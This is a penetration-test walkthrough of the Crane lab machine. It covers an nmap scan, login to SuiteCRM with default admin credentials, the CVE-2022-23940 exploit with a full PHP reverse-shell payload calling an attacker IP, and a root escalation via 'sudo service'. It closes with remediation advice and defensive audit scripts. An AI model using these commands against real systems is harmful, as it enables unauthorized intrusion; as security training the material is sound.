PG Practice - Crane Walkthrough

Dec 26, 2023 · 5 mins read

Attack Narrative

This post details the step-by-step process of a penetration test conducted on the PG Practice machine, Crane. It highlights critical vulnerabilities and misconfigurations that could potentially be exploited by attackers to gain unauthorized access and escalate privileges within a system. The narrative is structured into three key phases: Reconnaissance, Initial Foothold, and Privilege Escalation.

Reconnaissance

The first step was a thorough scan of the target's network services. Nmap was run against 192.168.194.146 over the full TCP port range plus a short list of common UDP ports, with the results saved in all three output formats via -oA targeted. The scan revealed SSH (22), an Apache web server (80), MySQL (3306) and the MySQL X protocol port (33060); the primary port of interest was the web server on port 80.

nmap --version-intensity=0 --min-rate=150 --max-retries=2 --initial-rtt-timeout=50ms --max-rtt-timeout=200ms --max-scan-delay=5 -Pn -sS -sV -sU -p T:1-65535,U:53,67-69,111,123,135,137-139,161-162,445,500,514,520,631,996-999,1434,1701,1900,3283,4500,5353,49152-49154 192.168.194.146 -oA targeted

Nmap scan report for 192.168.194.146
Host is up (0.054s latency).
Not shown: 65329 closed tcp ports (reset), 4 closed udp ports (port-unreach), 202 filtered tcp ports (no-response), 26 open|filtered udp ports (no-response)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.38 ((Debian))
3306/tcp  open  mysql   MySQL (unauthorized)
33060/tcp open  mysqlx?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.94%I=0%D=12/3%Time=656CDB11%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
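As an added example (not code from the original post), the following POSIX shell function extracts the open ports from the greppable file that the -oA targeted switch above writes as targeted.gnmap, so the interesting services can be handed to further tooling without re-scanning. The function name and the sample host line are assumptions; the sample is constructed from the scan results above, with one UDP open|filtered entry added to show that non-open states are skipped.

```sh
#!/bin/sh
# Added example for this walkthrough (not code from the original post): pull
# the open ports out of nmap's greppable output (the .gnmap file that -oA
# writes). The sample line below is constructed from the scan above.

# open_ports [FILE]: print "port/proto service version" for every port nmap
# reports as "open" (states such as "open|filtered" are skipped). Reads the
# file given, or stdin. A gnmap host line is tab-separated; its "Ports:" field
# holds entries of the form port/state/proto/owner/service/rpcinfo/version/
# separated by ", " (nmap replaces "/" inside version strings with "|").
open_ports() {
    awk -F'\t' '
        /^Host:/ {
            ports = ""
            for (i = 1; i <= NF; i++)
                if ($i ~ /^Ports: /) ports = substr($i, 8)   # drop "Ports: "
            n = split(ports, entry, /, /)
            for (i = 1; i <= n; i++) {
                split(entry[i], f, "/")
                if (f[2] != "open") continue                # skip filtered etc.
                printf "%s/%s %s", f[1], f[3], f[5]
                if (f[7] != "") printf " %s", f[7]          # version, if any
                printf "\n"
            }
        }' "$@"
}

# sample_gnmap: the Crane host line as nmap writes it to targeted.gnmap
# (constructed from the scan output above; the UDP entry is added to show
# the state filter).
sample_gnmap() {
    printf 'Host: 192.168.194.146 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.38 ((Debian))/, 3306/open/tcp//mysql//MySQL (unauthorized)/, 33060/open/tcp//mysqlx?///, 53/open|filtered/udp//domain///\tIgnored State: closed (65329)\n'
}

# Stand-alone demo on the constructed sample; on a real engagement use
#   open_ports targeted.gnmap
sample_gnmap | open_ports
```

On a real scan the same call is simply open_ports targeted.gnmap; because it works on the greppable file, the same function applies to any target scanned with -oA, not only to Crane.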

Navigating to the web server presented a SuiteCRM login page. SuiteCRM, a widely used open-source customer relationship management platform, is frequently deployed with its initial administrator credentials left unchanged, so the well-known default pair was tested in the next step.


Initial Foothold and Vulnerability Identification

The assessment uncovered a significant misconfiguration: the default SuiteCRM credentials, admin:admin, granted administrative access. The root cause is an operational one, default credentials never changed after installation, which leaves the application open to anyone who can reach the login page.


With administrative access, the platform was identified as SuiteCRM version 7.12.3. That detail allowed a focused search for vulnerabilities affecting this release, which turned up a publicly available exploit for CVE-2022-23940, a PHP deserialization issue in the AOR_Scheduled_Reports module.


CVE-2022-23940

CVE-2022-23940 provides remote code execution (RCE) by abusing the way the email recipients of a scheduled report are stored and later deserialized in the AOR_Scheduled_Reports module. Exploitation requires an authenticated user who is able to create scheduled reports, a condition the admin account obtained above satisfies, and yields arbitrary code execution on the server in the context of the web-server user.

The exploit by Manuel Zametter, available on GitHub, was used. It builds its payload with the Monolog/RCE2 gadget chain from the phpggc toolkit, which turns the deserialization of attacker-controlled data into execution of a chosen command.


Exploitation

The exploitation process began with cloning the CVE-2022-23940 exploit from GitHub and installing its dependencies. Following a review of the exploit’s usage instructions, a Netcat listener was set up on port 8443 to capture the incoming reverse shell connection.

Downloading Exploit:

git clone https://github.com/manuelz120/CVE-2022-23940

Installing Dependencies:

pip3 install -r "requirements.txt"

Setting Up Netcat Listener:

nc -nvlp 8443

Running the exploit initially produced a 'bad file descriptor' error, which was attributed to the shell mangling the payload. After adjusting the payload string (the working invocation below differs from the original only in the whitespace after the semicolon inside the php -r argument), the exploit was run again and this time established a reverse connection, giving a shell as the www-data user on the target. Note that this error message is also what /bin/sh prints when file descriptor 3 is not open, which is exactly what a failed fsockopen() looks like (listener not yet running, wrong LHOST or LPORT), since the one-liner assumes the socket lands on descriptor 3; it is worth confirming the listener before reworking the payload.

Original Payload Syntax:

python3 exploit.py -h http://192.168.194.146 -u admin -p admin --payload "php -r '\$sock=fsockopen(\"192.168.45.154\", 8443); exec(\"/bin/sh -i <&3 >&3 2>&3\");'"


Working Payload Syntax:

python3 exploit.py -h http://192.168.194.146 -u admin -p admin --payload "php -r '\$sock=fsockopen(\"192.168.45.154\", 8443);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"


Privilege Escalation via Sudo Misconfiguration

To explore potential paths for privilege escalation, the sudo privileges of the www-data user were enumerated. Executing the command sudo -l revealed a misconfiguration: the www-data user was allowed to execute /usr/sbin/service with root privileges without requiring a password.


Capitalizing on this misconfiguration, sudo /usr/sbin/service /////bin/bash was executed. The service wrapper does not confine its argument to the name of an init script under /etc/init.d, so handing it a path to a shell makes the script, running as root under sudo, execute bash instead of a service; GTFOBins documents the same primitive in the form sudo service ../../bin/sh. The resulting shell was verified with id, which returned uid=0(root) gid=0(root) groups=0(root), confirming full root access to the system.


Recommendations

SuiteCRM Default Credentials Vulnerability

Change Default Credentials: It is critical to change the default credentials of SuiteCRM to strong, unique passwords. Ideally, these passwords should be at least 16 characters long and include a mix of alphanumeric and special characters. This step is fundamental in preventing unauthorized access.

Enable Multi-Factor Authentication (MFA): If feasible, implement multi-factor authentication for an additional layer of security. MFA significantly reduces the risk of compromised credentials leading to unauthorized access.

Restrict Access: Limit access to SuiteCRM strictly to those individuals who require it for their business operations. Implementing role-based access control ensures that users have only the permissions necessary for their roles, reducing the risk surface.

SuiteCRM Remote Code Execution (RCE) Vulnerability

Update SuiteCRM: Ensure that SuiteCRM is updated to a version that addresses this vulnerability. Regular updates and patch management are crucial in mitigating known security vulnerabilities.

www-data User Sudo Privileges Misconfiguration

Restrict Sudo Privileges: Remove the NOPASSWD rule that lets www-data run /usr/sbin/service. A web-server account rarely needs sudo at all; where a restart is genuinely required, grant the exact command and arguments (a single init script and action) rather than a wrapper that accepts arbitrary paths, and never without a password.

Regular Audits of User Privileges: Conduct regular audits of user privileges to identify and correct any misconfigurations. This should be part of ongoing security maintenance and monitoring activities.
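The sudo rule abused in the privilege-escalation section and the two recommendations above (restrict sudo privileges, audit them regularly) can be checked with a small script. The following is an added example, not code from the original post: a POSIX shell function that reads sudo -l output and flags NOPASSWD command specs whose binary is known to hand the caller a shell. The function name, the list of binaries (a short assumed subset of what GTFOBins documents) and the sample sudo -l output are assumptions; the sample is constructed to mirror the rule found on Crane.

```sh
#!/bin/sh
# Added example for this walkthrough (not code from the original post): flag
# NOPASSWD sudo rules whose command can hand the caller a root shell, which is
# the class of rule abused above with /usr/sbin/service.

set -f   # sudoers command specs may contain "*"; never let the shell glob them

# Binaries that spawn a shell or run arbitrary commands when executed as root,
# plus the literal "ALL". Assumed short subset of the GTFOBins sudo list.
SHELL_SPAWNERS="ALL service env bash sh dash zsh vi vim nano less more find awk perl python python3 tar zip"

# sudo_nopasswd_findings: read "sudo -l" output on stdin and print one line per
# risky NOPASSWD command spec as "<command spec>  =>  <binary>". Rules that
# still require a password are out of scope and ignored. Handles the common
# single-tag form "(user) NOPASSWD: cmd1, cmd2"; a later per-command PASSWD:
# tag on the same line is left unflagged because it does need a password.
sudo_nopasswd_findings() {
    while IFS= read -r line; do
        case "$line" in
            *NOPASSWD:*) ;;
            *) continue ;;
        esac
        # Text after the last "NOPASSWD:" is a comma-separated command list.
        printf '%s\n' "${line##*NOPASSWD:}" | tr ',' '\n' | while read -r cmd; do
            set -- $cmd                 # $1 = command path, $2.. = fixed arguments
            [ $# -ge 1 ] || continue
            bin=${1##*/}                # /usr/sbin/service -> service
            for s in $SHELL_SPAWNERS; do
                if [ "$bin" = "$s" ]; then
                    printf '%s  =>  %s\n' "$*" "$bin"
                    break
                fi
            done
        done
    done
}

# Constructed sample "sudo -l" output: the rule found on Crane plus two others
# (one harmless NOPASSWD binary next to a shell, and one that needs a password).
SAMPLE_SUDO_L='Matching Defaults entries for www-data on crane:
    env_reset, mail_badpass

User www-data may run the following commands on crane:
    (ALL) NOPASSWD: /usr/sbin/service
    (root) NOPASSWD: /usr/bin/id, /bin/bash
    (root) /usr/bin/systemctl restart apache2'

# Stand-alone demo; on a real host use:  sudo -l 2>/dev/null | sudo_nopasswd_findings
printf '%s\n' "$SAMPLE_SUDO_L" | sudo_nopasswd_findings
# /usr/sbin/service  =>  service
# /bin/bash  =>  bash
```

The check flags the binary regardless of any arguments fixed in the rule, so a tightened entry such as www-data ALL=(root) NOPASSWD: /usr/sbin/service apache2 reload still shows up and has to be reviewed by hand; the point is that /usr/sbin/service with no argument restriction, as on Crane, is a root shell, and the script makes that class of rule visible on every host it is run on.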
